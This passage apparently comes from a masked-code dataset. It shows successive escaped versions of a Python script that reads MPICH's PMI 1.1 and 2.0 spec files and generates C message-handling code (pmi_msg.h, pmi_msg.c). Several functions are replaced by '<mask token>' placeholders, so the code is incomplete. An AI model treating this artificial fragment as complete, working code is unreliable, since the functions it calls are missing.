v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, \"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n else:\n print(\n ' return (version == PMIU_WIRE_V1) ? 
\"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return non_optional\n\n def dump_it(NAME, v_list, is_set, 
is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', file=Out)\n print(' return pmi_errno;', file=Out)\n 
print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', '.join(tlist)\n\n\n<mask token>\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n else:\n raise Exception('unexpected kind ' + kind)\n\n\n<mask token>\n\n\ndef dump_copyright(out):\n print('/*', file=out)\n print(' * Copyright (C) by Argonne National Laboratory', file=out)\n print(' * See COPYRIGHT in top-level directory', file=out)\n print(' */', file=out)\n print('', file=out)\n print('/* ** This file is auto-generated, do not edit ** */', file=out)\n 
print('', file=out)\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\ndef main():\n load_pmi_txt('maint/pmi-1.1.txt', '1.1')\n load_pmi_txt('maint/pmi-2.0.txt', '2.0')\n dump_all()\n\n\ndef load_pmi_txt(pmi_txt, ver):\n cur_hash = {'version': ver}\n G.pmi_vers.append(cur_hash)\n prev_cmd = None\n cur_cmd = None\n cur_attrs = None\n with open(pmi_txt, 'r') as In:\n for line in In:\n if RE.match('([A-Z]+):', line):\n name = RE.m.group(1)\n cur_cmd = {'version': ver}\n cur_hash[name] = cur_cmd\n if name not in G.cmd_hash:\n G.cmd_list.append(name)\n G.cmd_hash[name] = cur_cmd\n prev_cmd = None\n else:\n prev_cmd = G.cmd_hash[name]\n elif RE.match('\\\\s+([QR]):\\\\s*([\\\\w-]+)(.*)', line):\n QR, cmd, tail = RE.m.group(1, 2, 3)\n cur_attrs = []\n if QR == 'Q':\n cur_cmd['query-name'] = cmd\n if RE.match('.*wire=.+', tail):\n cur_cmd['query-attrs'] = []\n else:\n cur_cmd['query-attrs'] = cur_attrs\n else:\n cur_cmd['response-name'] = cmd\n cur_cmd['response-attrs'] = cur_attrs\n elif RE.match('\\\\s+([\\\\w-]+):\\\\s*([A-Z]+)(.*)', line):\n name, kind, tail = RE.m.group(1, 2, 3)\n cur_attrs.append([name, kind, tail])\n elif RE.match('\\\\s+([\\\\[\\\\]])', line):\n cur_attrs.append(RE.m.group(1))\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n 
v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, \"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n else:\n 
print(\n ' return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return 
non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', 
file=Out)\n print(' return pmi_errno;', file=Out)\n print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_get_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n else:\n raise Exception('unexpected kind ' + kind)\n\n\n<mask token>\n\n\ndef dump_copyright(out):\n print('/*', file=out)\n print(' * Copyright (C) by Argonne National Laboratory', 
file=out)\n print(' * See COPYRIGHT in top-level directory', file=out)\n print(' */', file=out)\n print('', file=out)\n print('/* ** This file is auto-generated, do not edit ** */', file=out)\n print('', file=out)\n\n\ndef get_include_guard(h_file):\n h_file = re.sub('.*\\\\/', '', h_file)\n h_file = re.sub('\\\\.', '_', h_file)\n return h_file.upper() + '_INCLUDED'\n\n\n<mask token>\n",
"step-4": "import re\nimport os\n\n\nclass G:\n pmi_vers = []\n cmd_list = []\n cmd_hash = {}\n\n\nclass RE:\n m = None\n\n def match(pat, str, flags=0):\n RE.m = re.match(pat, str, flags)\n return RE.m\n\n def search(pat, str, flags=0):\n RE.m = re.search(pat, str, flags)\n return RE.m\n\n\ndef main():\n load_pmi_txt('maint/pmi-1.1.txt', '1.1')\n load_pmi_txt('maint/pmi-2.0.txt', '2.0')\n dump_all()\n\n\ndef load_pmi_txt(pmi_txt, ver):\n cur_hash = {'version': ver}\n G.pmi_vers.append(cur_hash)\n prev_cmd = None\n cur_cmd = None\n cur_attrs = None\n with open(pmi_txt, 'r') as In:\n for line in In:\n if RE.match('([A-Z]+):', line):\n name = RE.m.group(1)\n cur_cmd = {'version': ver}\n cur_hash[name] = cur_cmd\n if name not in G.cmd_hash:\n G.cmd_list.append(name)\n G.cmd_hash[name] = cur_cmd\n prev_cmd = None\n else:\n prev_cmd = G.cmd_hash[name]\n elif RE.match('\\\\s+([QR]):\\\\s*([\\\\w-]+)(.*)', line):\n QR, cmd, tail = RE.m.group(1, 2, 3)\n cur_attrs = []\n if QR == 'Q':\n cur_cmd['query-name'] = cmd\n if RE.match('.*wire=.+', tail):\n cur_cmd['query-attrs'] = []\n else:\n cur_cmd['query-attrs'] = cur_attrs\n else:\n cur_cmd['response-name'] = cmd\n cur_cmd['response-attrs'] = cur_attrs\n elif RE.match('\\\\s+([\\\\w-]+):\\\\s*([A-Z]+)(.*)', line):\n name, kind, tail = RE.m.group(1, 2, 3)\n cur_attrs.append([name, kind, tail])\n elif RE.match('\\\\s+([\\\\[\\\\]])', line):\n cur_attrs.append(RE.m.group(1))\n\n\ndef dump_all():\n\n def dump_enums(Out):\n print('enum PMIU_CMD_ID {', file=Out)\n print(' PMIU_CMD_INVALID,', file=Out)\n for NAME in G.cmd_list:\n print(' PMIU_CMD_%s,' % NAME, file=Out)\n print('};', file=Out)\n print('', file=Out)\n\n def dump_decls(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME 
in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n decls = []\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n params = get_set_params(v0['query-attrs'])\n decls.append('void PMIU_msg_set_query_%s(%s, %s);' % (\n name, std_query, params))\n params = get_get_params(v0['query-attrs'])\n decls.append('int PMIU_msg_get_query_%s(%s, %s);' % (\n name, std_get, params))\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n params = get_set_params(v0['response-attrs'])\n decls.append('int PMIU_msg_set_response_%s(%s, %s);' %\n (name, std_response, params))\n params = get_get_params(v0['response-attrs'])\n decls.append('int PMIU_msg_get_response_%s(%s, %s);' %\n (name, std_get, params))\n if len(decls):\n print('/* PMIU_CMD_%s */' % NAME, file=Out)\n for l in decls:\n print(l, file=Out)\n\n def dump_cmd_to_id(Out):\n print('int PMIU_msg_cmd_to_id(const char *cmd)', file=Out)\n print('{', file=Out)\n t_if = ' if'\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and 'query-name' in v[NAME]:\n t = v[NAME]['query-name']\n if t not in prev:\n cmp_list.append('strcmp(cmd, \"%s\") == 0' % t)\n prev[t] = 1\n if len(cmp_list):\n print(t_if + ' (' + ' || '.join(cmp_list) + ') {', file=Out)\n print(' return PMIU_CMD_%s;' % NAME, file=Out)\n t_if = ' } else if'\n print(' } else {', file=Out)\n print(' return PMIU_CMD_INVALID;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_str(Out, query):\n namekey = query + '-name'\n print('const char *PMIU_msg_id_to_%s(int version, int cmd_id)' %\n query, file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n for NAME in G.cmd_list:\n cmp_list = []\n prev = {}\n for v in G.pmi_vers:\n if NAME in v and namekey in v[NAME]:\n t = v[NAME][namekey]\n if t not in prev:\n cmp_list.append(t)\n prev[t] = 1\n if len(cmp_list) > 0:\n print(' case PMIU_CMD_%s:' % NAME, file=Out)\n if len(cmp_list) == 1:\n print(' return \"%s\";' % cmp_list[0], file=Out)\n 
else:\n print(\n ' return (version == PMIU_WIRE_V1) ? \"%s\" : \"%s\";'\n % (cmp_list[0], cmp_list[1]), file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_id_to_response(Out):\n print('const char *PMIU_msg_id_to_response(int version, int cmd_id)',\n file=Out)\n print('{', file=Out)\n print(' switch(cmd_id) {', file=Out)\n print(' default:', file=Out)\n print(' return NULL;', file=Out)\n print(' }', file=Out)\n print('}', file=Out)\n\n def dump_funcs(Out):\n std_query = 'struct PMIU_cmd *pmi_query, int version, bool is_static'\n std_response = (\n 'struct PMIU_cmd *pmi_query, struct PMIU_cmd *pmi_resp, bool is_static'\n )\n std_get = 'struct PMIU_cmd *pmi'\n\n def dump_if_version(t_if, version, is_set, is_query):\n if re.match('1\\\\.', version):\n ver = 'PMIU_WIRE_V1'\n else:\n ver = 'PMIU_WIRE_V2'\n if is_set:\n if is_query:\n print(t_if + ' (version == %s) {' % ver, file=Out)\n else:\n print(t_if + ' (pmi_query->version == %s) {' % ver,\n file=Out)\n else:\n print(t_if + ' (pmi->version == %s) {' % ver, file=Out)\n\n def dump_attrs(spaces, is_set, is_query, attrs, attrs0):\n non_optional = 0\n for i in range(len(attrs)):\n a = attrs[i]\n var = get_var(attrs0[i][0])\n if is_query:\n pmi = 'pmi_query'\n else:\n pmi = 'pmi_resp'\n if a[1] == 'INTEGER':\n kind = 'int'\n elif a[1] == 'STRING':\n kind = 'str'\n elif a[1] == 'BOOLEAN':\n kind = 'bool'\n else:\n raise Exception('Unhandled kind: ' + a[1])\n if is_set:\n pmiu = 'PMIU_cmd_add_' + kind\n print(spaces + '%s(%s, \"%s\", %s);' % (pmiu, pmi, a[0],\n var), file=Out)\n elif RE.match('.*optional=(\\\\S+)', a[2]):\n dflt = RE.m.group(1)\n pmiu = 'PMIU_CMD_GET_%sVAL_WITH_DEFAULT' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s, %s);' % (pmiu, a[0],\n var, dflt), file=Out)\n else:\n pmiu = 'PMIU_CMD_GET_%sVAL' % kind.upper()\n print(spaces + '%s(pmi, \"%s\", *%s);' % (pmiu, a[0], var\n ), file=Out)\n non_optional += 1\n return 
non_optional\n\n def dump_it(NAME, v_list, is_set, is_query, attrs):\n print('', file=Out)\n ret_errno = True\n if is_set:\n params = get_set_params(attrs)\n if is_query:\n ret_errno = False\n print('void PMIU_msg_set_query_%s(%s, %s)' % (name,\n std_query, params), file=Out)\n else:\n print('int PMIU_msg_set_response_%s(%s, %s)' % (name,\n std_response, params), file=Out)\n else:\n params = get_get_params(attrs)\n if is_query:\n print('int PMIU_msg_get_query_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n else:\n print('int PMIU_msg_get_response_%s(%s, %s)' % (name,\n std_get, params), file=Out)\n print('{', file=Out)\n if ret_errno:\n print(' int pmi_errno = PMIU_SUCCESS;', file=Out)\n print('', file=Out)\n if is_set:\n if is_query:\n print(\n ' PMIU_msg_set_query(pmi_query, version, PMIU_CMD_%s, is_static);'\n % NAME, file=Out)\n else:\n print(\n ' PMIU_Assert(pmi_query->cmd_id == PMIU_CMD_%s);' %\n NAME, file=Out)\n print(\n ' pmi_errno = PMIU_msg_set_response(pmi_query, pmi_resp, is_static);'\n , file=Out)\n attrs_b = None\n if len(v_list) > 1:\n if is_query:\n attrs_b = v_list[1]['query-attrs']\n else:\n attrs_b = v_list[1]['response-attrs']\n non_optional = 0\n if attrs_b is None or attrs_identical(attrs, attrs_b):\n non_optional += dump_attrs(' ', is_set, is_query, attrs,\n attrs)\n else:\n dump_if_version(' if', v_list[0]['version'], is_set,\n is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs, attrs)\n dump_if_version(' } else if', v_list[1]['version'],\n is_set, is_query)\n non_optional += dump_attrs(' ', is_set, is_query,\n attrs_b, attrs)\n if ret_errno:\n print(' } else {', file=Out)\n print(\n ' PMIU_ERR_SETANDJUMP(pmi_errno, PMIU_FAIL, \"invalid version\");'\n , file=Out)\n non_optional += 1\n print(' }', file=Out)\n if non_optional > 0:\n print('', file=Out)\n print(' fn_exit:', file=Out)\n print(' return pmi_errno;', file=Out)\n print(' fn_fail:', file=Out)\n print(' goto fn_exit;', file=Out)\n elif ret_errno:\n print('', 
file=Out)\n print(' return pmi_errno;', file=Out)\n print('}', file=Out)\n for NAME in G.cmd_list:\n name = NAME.lower()\n v_list = []\n for v in G.pmi_vers:\n if NAME in v:\n v_list.append(v[NAME])\n v0 = v_list[0]\n if 'query-name' in v0:\n if len(v0['query-attrs']):\n dump_it(NAME, v_list, True, True, v0['query-attrs'])\n dump_it(NAME, v_list, False, True, v0['query-attrs'])\n if 'response-name' in v0:\n if len(v0['response-attrs']):\n dump_it(NAME, v_list, True, False, v0['response-attrs'])\n dump_it(NAME, v_list, False, False, v0['response-attrs'])\n msg_h = 'src/pmi_msg.h'\n msg_c = 'src/pmi_msg.c'\n with open(msg_h, 'w') as Out:\n dump_copyright(Out)\n INC = get_include_guard(msg_h)\n print('#ifndef %s' % INC, file=Out)\n print('#define %s' % INC, file=Out)\n print('', file=Out)\n dump_enums(Out)\n print('', file=Out)\n dump_decls(Out)\n print('', file=Out)\n print('#endif /* %s */' % INC, file=Out)\n with open(msg_c, 'w') as Out:\n dump_copyright(Out)\n for inc in ['pmi_config', 'mpl', 'pmi_util', 'pmi_common',\n 'pmi_wire', 'pmi_msg']:\n print('#include \"%s.h\"\\n' % inc, file=Out)\n dump_cmd_to_id(Out)\n print('', file=Out)\n dump_id_to_str(Out, 'query')\n print('', file=Out)\n dump_id_to_str(Out, 'response')\n print('', file=Out)\n dump_funcs(Out)\n\n\ndef get_set_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_get_params(attrs):\n tlist = []\n for a in attrs:\n if len(a) == 3:\n tlist.append(get_kind(a[1]) + '*' + get_var(a[0]))\n return ', '.join(tlist)\n\n\ndef get_var(name):\n return name.replace('-', '_')\n\n\ndef get_kind(kind):\n if kind == 'INTEGER':\n return 'int '\n elif kind == 'STRING':\n return 'const char *'\n elif kind == 'BOOLEAN':\n return 'bool '\n 